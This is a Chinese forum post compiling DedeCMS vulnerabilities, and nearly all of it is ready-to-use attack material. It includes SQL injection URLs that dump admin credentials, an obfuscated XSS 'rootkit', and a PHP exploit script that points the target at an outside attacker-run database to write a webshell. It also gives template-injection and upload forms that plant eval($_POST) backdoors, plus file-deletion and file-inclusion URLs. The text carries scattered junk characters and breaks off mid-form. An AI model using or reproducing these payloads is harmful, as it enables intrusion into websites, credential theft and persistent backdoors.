dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞% e) |4 s; b5 e
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=14 ~; b0 A- r+ o0 M, E

$ y- I! A3 c5 O" L+ G" q# I& f- w) r1 W# \0 B4 E) q

5 r  {1 Q3 J- X( z1 n: P- X
% T: O% S' ~; _# X" s
, o) h+ k/ @+ }/ B6 ~* x+ K8 b& w6 M4 b: P

9 x( q; N( H) L9 q. Q: N2 I+ r3 x* u& U0 O' [/ E# V. {
DedeCms v5.6 嵌入恶意代码执行漏洞8 \( b5 s2 Y5 ~
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}9 G( Z3 K( Q& E- R5 B
发表后查看或修改即可执行( H/ ]2 R% D" E3 V
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}* Z6 }+ @- f3 Q
生成x.php 密码xiao，直接生成一句话。  B6 o& g1 U1 I' g. F( V# R% t
; r1 H6 {: e7 A+ h* S+ m

7 B+ R9 b! Q6 g6 a
. x' Q4 o% W, m. f8 c4 u: {& j! z8 T' @+ G4 @
4 o" T% p- S) E6 Z

6 K, z9 q: u% {4 R* _* R. \( r3 e6 O) a( r' a, v

. s2 }1 U0 L  YDede 5.6 GBK SQL注入漏洞& U! O, w7 u: e% A  V
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';% a" h0 H/ |6 S- K3 {/ T& L; s
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
' s( [" l" j9 n3 V7 B. zhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
! @# t8 D2 `& P4 e9 j6 v
5 j9 F4 h& a( U3 K% g: M7 I! @* E3 ~1 E* C' K, @' D
) o; d# H" P2 l3 W) {2 T
. u# h# [! v( v* b

$ m- I' z8 }. k6 ~) X2 h* E, p& Y
/ H! J& f1 r# s1 ~( tDEDECMS 全版本 gotopage变量XSS漏洞
$ l2 w" j1 l2 M, e9 W1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。 9 j% w9 a9 Y7 H% X. |
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=") V7 @5 |7 C0 A8 F- M9 t
- q5 ^6 f9 |! q$ F  ^! {

6 N2 D: Z7 {& n2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
1 G: `+ `$ m4 v' g4 `  \% {4 L( nhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell
: V- O5 V: W$ {, q& Z/ h#!usr/bin/php -w  {9 g4 W' i  w7 e* f
<?php
# F4 f4 j2 `4 `. u3 d6 J" w3 J# _error_reporting(E_ERROR);
; n# t3 [, a5 ^0 tset_time_limit(0);$ G8 l" O" k1 F9 `# O' K( ]; n
print_r('
1 e/ f- I5 U0 x3 ^# I6 f3 aDEDEcms Variable Coverage: y! z) F1 z  A: v9 U; |
Exploit Author: www.heixiaozi.comwww.webvul.com
);- j2 d+ g: L+ Y; C- E( O
echo "\r\n";9 k6 |% X6 H! W6 t
if($argv[2]==null){
3 @6 @* J2 B4 a: Pprint_r('
/ ?* L) v( l0 l% c* ~3 G, c0 \+---------------------------------------------------------------------------+
3 u7 k* q) Q" gUsage: php '.$argv[0].' url aid path1 k+ m% |' U% y7 A3 G6 G
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
8 x& r6 T* a$ ~. h- ?Example:1 s( w4 i6 d2 W
php '.$argv[0].' www.site.com 1 old
* u" I* D$ |. A5 J- A  x+---------------------------------------------------------------------------+
4 @' I# m: Q8 u  y+ j( W# @');
, v# h# S/ H- e* C; m7 ~& iexit;- v# `( m2 w  b' Y9 G
}! S: z, Q0 S8 F6 }/ @2 {$ H+ b
$url=$argv[1];1 P- Q, t2 I5 O! ?
$aid=$argv[2];1 n/ M4 H9 ~( R/ s+ D
$path=$argv[3];* |2 x6 h0 v2 r9 Y  _! N1 @2 f
$exp=Getshell($url,$aid,$path);
5 I5 {8 w6 X% o) K. Iif (strpos($exp,"OK")>12){7 j& p) _6 q7 _4 C( P( [
echo "" ^) H' v! E/ ^
Exploit Success \n";& K2 |5 K, n! G- u' n- j
if($aid==1)echo "; E" y+ Z) L% h+ J" R, t# l5 u3 W
Shell:".$url."/$path/data/cache/fuck.php\n" ;
! l6 e+ h, X2 a- d0 X
# _8 T0 I* o3 `
0 `, d# {5 o* jif($aid==2)echo "
4 {  H- \- \! c# {4 NShell:".$url."/$path/fuck.php\n" ;
% ^, s7 U1 x6 B- U; _4 T1 e  X' \% d& x8 @0 {. {' Z, [! U5 i6 w
! _+ S+ z# x! i% i# V
if($aid==3)echo "0 D/ B* I4 o. g; [- X
Shell:".$url."/$path/plus/fuck.php\n";8 h$ `& Z& H  h. t+ V
1 L7 ^9 M. p! q4 a
8 C' l& R% _5 w! Y- J6 N$ l& a
}else{
% I' ?, O: w3 N4 Necho "
2 n, I0 c8 W  t4 R0 ~9 bExploit Failed \n";+ J( @+ f& Y: r9 S+ r
}
4 D$ I% P: Y, L# A. qfunction Getshell($url,$aid,$path){
9 _) O; P' @: s& a- L$id=$aid;3 }, c& v4 Q: @
$host=$url;$ q! J9 g0 e- v6 K
$port="80";* D" p6 q- b! j3 S0 c
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% L7 z1 d) B5 s/ [& h
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
4 l* L7 }0 @: s0 k9 s: b$data .= "Host: ".$host."\r\n";0 T) t6 N7 d, J9 K- a
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
8 N; k- y, B0 N$ N. N) h: w9 _5 Q$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$ z- ^) i1 V  A  c# X; x* E- c+ S$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";+ p. Z7 h. I3 ?; j
//$data .= "Accept-Encoding: gzip,deflate\r\n";+ s1 G' g( C5 ]3 V
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
' O+ a1 N3 g3 R9 L! p- f5 ]5 [% P$data .= "Connection: keep-alive\r\n";8 M8 w* q+ O6 W/ p' l
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";4 n" t8 i4 Z! t+ q% w+ V0 O5 o$ @) z
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";0 ?* X% \$ F7 ]
$data .= $content."\r\n";
3 t, \5 i3 ~2 ~& d# S6 S( f$ock=fsockopen($host,$port);
% [' L( ?5 V% R+ h3 T- R! bif (!$ock) {# D8 o$ T/ A" M. _# l
echo "- g; D+ b2 L1 H$ v6 v
No response from ".$host."\n";6 Z3 {3 t- l" x
}
- f0 R  |' A  h$ ?9 x% L; sfwrite($ock,$data);& F  C6 o/ K& B) A$ l3 M
while (!feof($ock)) {
/ s) E& z3 c  S7 P8 S( E$exp=fgets($ock, 1024);& t$ o3 e6 _) Q+ O( \) i6 \# f
return $exp;" O  l4 I- b6 Q; P$ r# u* Y6 e2 K
}  F0 G& [: B; g
}
3 G/ i! I$ M/ }! {: |. w# P1 l# q) ?. f; I0 l

# T: Z# F6 Q' u?>$ |. T- R& a! a9 \$ l. T% v, T

0 w$ ?  G1 i4 `& B4 [, R& _' r7 u- }4 W, e+ f$ ~  ?5 N
6 {! C: I; g/ l, P; \  n
+ N( ~( \. _- w# K: ?1 T
' h3 t1 ^+ L9 h6 p3 G6 B
0 |) c$ W3 F4 T! ~9 l% Q

% X# B) F. {) H6 j6 X( W
+ q  s/ t. @1 o. J' y6 B/ r2 p4 R( f7 h& k6 l$ L3 }5 _8 x
4 X- o2 ~! @& U; }; ]8 o" n8 b
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
8 V- W' M8 L1 W$ ^+ L1 G: Uhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root6 k( I* v  Z" ?
- s8 d. S2 x  N2 c9 C" Y& H

! _- U! T: D$ y( R把上面validate=dcug改为当前的验证码，即可直接进入网站后台
! G( Z: n: X! l5 v/ ~  D+ S, F0 a4 K
5 n. y' d1 m+ E' Z% ?. K9 B9 X$ J8 W
此漏洞的前提是必须得到后台路径才能实现8 Q: A& Q/ h3 [' J
9 n% o: R1 e9 ^; H
1 j* F* f$ }/ l* B7 R2 r

& g, B, F, V+ e4 n
; t1 N. D( x1 C7 A$ @- z0 b1 l# c0 t/ b' ~
' E5 Y4 u9 v" K" P# l* O4 v& a

/ E. X) N/ R5 a
# D2 v  n, s$ l* m5 H* G( l0 \* ~, _% K, p5 k, U7 T: ?- Y
; q4 F" f8 g; S' \0 E' O) ?
Dedecms织梦标签远程文件写入漏洞
1 q6 z. a9 v# h- ]$ U' G" n前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
* ?: }' X/ n2 B  N7 g2 m
6 H- a. O1 g0 s/ {* F1 U" g9 m" e- T
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。   W) |1 I# n  h7 c9 F
<form action="" method="post" name="QuickSearch" id="QuickSearch">
$ w3 W% r+ d$ Z, \5 b<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />/ s- g5 @: l! I" w( x* ?7 R5 v: M
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />: Q1 J( I; i2 H, W
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
. }, z+ K/ {  A7 @/ f; A<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />, z8 Y  g# G/ v: s' V/ k
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
: @2 j, l, q  R. t0 [! [<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />0 l- Q  x) q7 @& {
<input type="text" value="true" name="nocache" style="width:400">; ~' L5 B0 ?, I' Q- L! T
<input type="submit" value="提交" name="QuickSearchBtn"><br />
, l/ i5 g# y( A) S2 @</form>
2 G3 m, s  y& }5 _" e/ \# J9 `2 q<script>  f4 m  z$ N9 e  I( G; V( `
function addaction()2 t) ?' K5 o1 }: P$ m
{
. e3 k: w: D! F/ o( v+ hdocument.QuickSearch.action=document.QuickSearch.doaction.value;
& D4 Z' u0 h# p8 p$ u6 o}$ z6 K' o! Z( Z2 B0 w
</script>, S2 O' t( g  p( K3 Y) C
- O" b9 J1 Z, b8 `8 n/ }6 Y

- ~9 b- \+ p; N) Z# W) p1 g* w8 O3 m6 e( x
. U* \& O  r5 o8 K/ i% `7 {
# \8 y: R: z4 l+ [
8 U9 v8 T7 V5 s, f5 F  p+ k; b
5 j* Y: H8 k& A

% J. E6 z% D9 ^5 p3 G. y$ m" b0 z5 J2 r# A2 h" k, N) y

1 c: `, J  K& o8 ~2 u7 }DedeCms v5.6 嵌入恶意代码执行漏洞
; S  N$ ?  _" G3 g* K8 A2 ?注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
- T1 z3 ?; r" t7 wa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 G3 ]) Z0 N' n9 D1 \& Q
生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得$ K1 y2 V. a- l+ V( ?
Dedecms <= V5.6 Final模板执行漏洞. ?9 L1 P, H* ]4 Z, y$ }
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
2 O- b4 \  a2 n( T- G" Yuploads/userup/2/12OMX04-15A.jpg
0 n5 l% ]5 F( p
3 |7 m4 h3 y2 E2 D) ~+ k- j, G
; d) I7 `* E+ w- n+ A7 q模板内容是（如果限制图片格式，加gif89a）：
0 n) I' S, v* N! D/ Z{dede:name runphp='yes'}( P' L8 S: U6 w0 |- F
$fp = @fopen("1.php", 'a');
) x7 v* S4 Q2 u6 C@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
5 v' W$ h3 R2 C% b. h& ~0 c& w@fclose($fp);1 C: k$ m, {9 R4 K, {( a- i
{/dede:name}+ r8 ~2 k& F6 i0 @% j  \. R* b. c2 E- C
2 修改刚刚发表的文章，查看源文件，构造一个表单：
  |! @* Q; X& W2 |) O<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
/ W" @& g, g4 t1 I$ a6 V<input type="hidden" name="dopost" value="save" />
' ]+ r6 R8 K  U" R! l<input type="hidden" name="aid" value="2" />- W+ w& @& W9 K5 A* L% n% g5 ?, V4 H
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
3 M8 Y6 @- N) V<input type="hidden" name="channelid" value="1" />1 R: Z$ [  ]' h$ @% @+ T
<input type="hidden" name="oldlitpic" value="" />. \: |9 F4 N/ g
<input type="hidden" name="sortrank" value="1275972263" />
4 h' |3 Y! \$ X) y7 E0 H$ R) `: [( ~; b1 d) P0 @, R6 j6 Q8 Q
0 _$ |7 c, C* t7 R
<div id="mainCp">
+ D8 q, q! w6 L1 l% ]4 Q<h3 class="meTitle"><strong>修改文章</strong></h3>
# ]6 v7 }5 e% n3 c; h( e* k3 G1 P! Z1 K- S- V
5 ~; ?; @& O+ g- T7 e
<div class="postForm">/ w7 S& z# @+ a/ Y; {
<label>标题：</label>( b4 U9 O* L3 w9 E8 l+ s. B
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
9 H( P. |, R% O. W/ b0 I& {! ]
; h% J* R9 K/ z5 F  P  y5 w, {8 f; {5 L2 N$ X8 i
<label>标签TAG：</label>
6 Q: a; y& @' ]$ U4 l8 B7 `<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)2 x3 f+ D& L+ k" D! C8 V
# F7 ^: ?5 V0 R$ P
4 a& ^  Z. b& ?% `9 Z+ W
<label>作者：</label>
& c0 R0 {; N& b( {. `, T<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>0 N( w+ A7 ?: \( ]4 R

; k% L6 q# f5 s, H1 @4 _4 Z
3 J' ^5 p: {+ X4 n4 C* o6 Q4 i<label>隶属栏目：</label>
+ [2 l) R5 B0 I; H% W<select name='typeid' size='1'>
9 n8 k, J' E) M+ C" n<option value='1' class='option3' selected=''>测试栏目</option>
- g/ [6 C, S; m' K* b9 \3 n  m</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
, p$ l- X' r( @: c( V* K5 R* v, l+ h
6 H, P& c4 e5 A& {6 v7 [2 Y) D4 y! J' L* I' E
<label>我的分类：</label>
( O+ z: g1 P! g, f5 W<select name='mtypesid' size='1'>
7 b. V* t, J; V5 d" J<option value='0' selected>请选择分类...</option>7 v4 Y: B4 b& J5 |
<option value='1' class='option3' selected>hahahha</option>
; P+ p. q, k( T" [* }9 F; H& [</select>
; Y, O) w$ |/ C. L
$ m% R: C5 e8 g8 p8 ^/ X% y2 m, |% u6 y/ `) H& H8 ^
<label>信息摘要：</label>! r$ l) U  d  E/ i
<textarea name="description" id="description">1111111</textarea>4 [) h6 x  d$ c7 p
(内容的简要说明)
  j5 f- ?3 a% W2 `) V2 j4 [, R) L
3 ?! Y* ?5 \+ y; h9 A( X4 k& |* p% t- D0 Z5 D) p
<label>缩略图：</label>) h9 U) d7 i' S8 v
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
- [- R- f9 b/ l# _' L0 {8 v6 u6 Z
9 T0 }. g7 [  f; S/ }3 Q6 W8 n4 V/ n4 X# G( I- t  O4 p) Z( v
<input type='text' name='templet'
# X* |% Q6 ^: B( V3 Ovalue="../ uploads/userup/2/12OMX04-15A.jpg">
& j! Y/ p" }! E9 R<input type='text' name='dede_addonfields'
: W; l! j  \7 ?& b+ ivalue="templet,htmltext;">（这里构造）) `  _; D! v- v* f7 J) w9 c
</div>% _) M- X' G3 ?( ]

  d5 W& F) C* u* u" h. W& M+ W* x; C
2 D" s' Z. ]$ v0 ~3 Z6 Z
<h3 class="meTitle">详细内容</h3>: ~, L! j8 J% {/ F! r

: F4 W+ _) s3 @* }& h6 T& q7 i3 K; N9 q$ U# ?* J
<div class="contentShow postForm">- V) Y7 v& {+ e% Z4 ~, s2 f
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>5 {. m3 n# }6 ^& ]* ?9 C1 Y8 _
, O& X8 M' y0 E- u5 f  K. k2 ~
* T2 Q" }4 I9 g% L
<label>验证码：</label>
' {' C% E2 A( e! Z0 w* l4 ~" X<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
' o, X+ D4 O4 t# F<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
7 u6 ]" A3 V& W( J. {; j- q* D$ u- Z4 I  S9 n& ?
2 u( Z0 u# l8 w! B$ `* h
<button class="button2" type="submit">提交</button>
0 s; x7 Z/ L1 w<button class="button2 ml10" type="reset">重置</button>
; R  P" i: x( B( p% L+ q8 ]</div>, T( T4 m0 G: y. s/ v7 i

( Q0 ^$ W1 Q# ?% v2 L0 K0 [& r6 z$ }" n; I/ B" x) v
</div>
% B+ s# J4 `) o( g4 ^' A5 r% e2 r

& k0 m4 R. y5 H! X4 @7 }</form>
/ F( r* w. [% g$ y: G3 F2 A6 d* Z: T* [* p' E4 x
- X  \% I' _- {' N# {) g8 Z6 p# H1 _
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
8 L) I+ ^  }% I! n8 K2 ?假设刚刚修改的文章的aid为2，则我们只需要访问：3 x2 O* Q8 [1 I+ w# t' Y+ d
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php# l7 L" Q8 f: x, E+ k4 {( M
/ Y: g( d" y6 Q  R- W0 R! D
8 @5 F6 h  M) e4 B

5 ]: x1 Q2 Y! }) b  I& a
' h6 ], x9 D8 L- `# Z' |$ R2 E- k

6 d# S9 H5 i4 v
% F: H- {! M" y2 A8 C' l3 \/ I) C! F. s8 h2 V! ]) v3 }

, d; A' R3 S8 `6 ~/ f
* z5 p$ _: O+ e( G- w5 r( X( V, Y& u7 B, X5 R2 {, e
! {! |+ P8 [6 d/ M9 D
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
$ W/ S: o( j7 HGif89a{dede:field name='toby57' runphp='yes'}7 x" ^( \5 O5 G, Q; J+ \
phpinfo();
0 l8 n1 V3 H1 F% b* [{/dede:field}
/ `, o* j! a6 |: |/ O保存为1.gif
8 Q! ]# ?/ j. o0 Y) o<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
1 h& H0 U6 _9 s<input type="hidden" name="aid" value="7" />
6 w7 l+ }* l5 x( U9 T4 \) w<input type="hidden" name="mediatype" value="1" /> ( r% S1 l" k+ e
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
& @/ V7 l2 c$ y, h/ K<input type="hidden" name="dopost" value="save" /> 4 w6 T/ R, Y# \9 `; C5 A
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
' `7 o% X1 O6 O* {<input name="addonfile" type="file" id="addonfile"/> 2 p- I0 V2 [! o" J, r
<button class="button2" type="submit" >更改</button> ( e9 L0 c9 j7 K8 }8 G7 O
</form> ) k; c8 u9 p; l, C- H; c
% b: H4 u4 D0 j
" i, [2 n0 @5 W8 a& ~* i
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
. g+ B+ I( Z% h1 i! z: ?: \发表文章，然后构造修改表单如下：/ H9 M/ W' Q8 w" E0 C$ y3 N
: y3 l: e# V7 }

( p0 N: z3 A5 \. s; C; H- K7 B<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
# M* q8 A; l" o" @+ l. I5 d<input type="hidden" name="dopost" value="save" /> 3 e/ R4 r, `! c/ t- `  D3 X
<input type="hidden" name="aid" value="2" />
5 R. m3 g( @. \1 n<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
; Q" ?3 s% L8 B$ O0 ~; S: |1 l( a<input type="hidden" name="channelid" value="1" />
& `- B  I; [/ ]3 x6 V% X" s8 p- o1 \<input type="hidden" name="oldlitpic" value="" />
  [9 l( L- w$ F* H3 ?9 S3 j<input type="hidden" name="sortrank" value="1282049150" /> % l% J- H1 `* L) ?+ a
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> - T0 A" p( ~- [# z$ v! [5 T5 w
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
- G/ w/ F; T3 S<select name='typeid' size='1'> # }2 O  v! R6 D/ @
<option value='1' class='option3' selected=''>Test</option> 5 A' b8 N: s8 W) _& X
<select name='mtypesid' size='1'> / q" v6 i: N* S  I7 j- N& Z5 s/ `3 ]
<option value='0' selected>请选择分类...</option>   y& e; {( L  o4 d
<option value='1' class='option3' selected>aa</option></select> - v2 u' A& I  m( O. E
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> % Z. p' f+ H2 ]: a: Z
<input type='hidden' name='dede_addonfields' value="templet"> 6 U2 k1 }$ h: S. F. _- k
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
; q5 E2 m2 a- s/ t, _3 v<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
, ~$ I: G6 ]$ Z" O; `# f<button class="button2" type="submit">提交</button> & m. u' m* d7 f
</form>
% N0 h2 l/ F3 a' V" o) S) h  P3 l
3 ?2 U6 ]& \* Y- a$ V

! g( [* f7 u+ X( J0 a; @
: q6 ]1 Y1 J+ l) y) S% i+ o4 M4 a' C* U& i6 y

2 d5 N7 S/ f4 @: u
$ o+ I1 a0 {$ n- ]; Q
+ e( Y6 u* K- ?2 Y& d& i; {# Z" W* [+ q: O, }! \7 q: k

1 }  K8 [+ A& k3 K9 d- Z
9 ^1 b- ~7 S2 S
. @; S/ u9 k1 ?# e3 n织梦(Dedecms)V5.6 远程文件删除漏洞
7 B$ r2 T6 B4 a, H; s# A# e$ C! nhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 , K& j" I  T  d$ U- M4 w
http://www.test.com/plus/carbuya ... urn&code=../../
. r' {' j5 C, Y# j. _
. y0 t3 ~, X( o, u
: i  c1 y) x' I' ?# ~: z
" \4 i. _8 a0 @# d# N+ o5 p) }: w* z# }" ?; T' K# ~
' V: z7 u# v; P5 N

( \: K9 x" O8 b8 W
0 F* Z' N/ f2 S; l: ~# Q+ m( C) k: q# p

$ H  G8 H$ i) w8 R0 `! D2 R$ U1 a
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 / N; A" |. t/ C, B+ z
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`# Z- J* e9 ~7 K4 K/ D; K  c/ m
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD54 ?$ x: P1 t4 v
, _5 _6 A3 `) N) _8 R- u$ D

% R: W$ F3 D/ v0 K: P9 Z) f( D  a1 O2 |9 d, y' o- P1 S" P; z) t

9 ]& l8 Y: g. C1 y: H3 t: {2 z  D' O+ a: m3 G9 \2 b

6 ^2 H! T" ?  G+ v( i3 C
) w  n, j& K! S) e" \+ V
& o) I3 V9 f1 ~4 I) e6 q, E" h7 _4 r  Y2 s

# y+ ^0 D. O6 M8 C织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
* o1 L, f3 x! S9 d1 F; b+ I0 J! Yhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
( |; t" w( r6 `. S" w
& o- P& e, |3 ]5 q6 y  M- H. _4 x" t) w# s0 `! r4 j6 Q6 G

. U' J1 n& E1 L# s) x9 a3 Y6 M7 f0 c, y

, z0 F3 R, F0 h9 E0 Z. Q, }% r, F! F  y5 A2 z$ x! i) X

, {, Z: N3 e, E+ q$ Y/ W" ~4 W) B
( {# ]! c2 r  ]
4 i& ]: O' ^# N% K0 x3 y+ \6 a3 g6 j8 ~" M7 J  N
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞" L9 p8 U& D9 z" p
<html>$ [; a2 Y0 f. }- `
<head>; \. m, O# S; ^
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
2 O. S( T( R5 V  I</head>: e% G) X5 u! a
<body style="FONT-SIZE: 9pt">
4 `) t; ^) `; m( O2 n0 B---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /># I2 Z- Q+ j9 w  t4 d
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  |" T6 K. G1 a<input type='hidden' name='activepath' value='/data/cache/' />
% |2 y2 [, C) Q3 x4 E<input type='hidden' name='cfg_basedir' value='../../' />
7 ]- j' H1 j$ ]<input type='hidden' name='cfg_imgtype' value='php' />3 ?% G5 m) [0 X- o+ n
<input type='hidden' name='cfg_not_allowall' value='txt' />
; n; G0 w" Q- \$ ?( H& c7 ?1 `3 k<input type='hidden' name='cfg_softtype' value='php' />
# ^4 a7 F( o: y) ^& w+ [# z<input type='hidden' name='cfg_mediatype' value='php' />* D% Q  I' D/ X$ |+ C' C( q* ^/ n
<input type='hidden' name='f' value='form1.enclosure' />3 B6 A3 t! V; j$ _" |- M8 }; W+ D
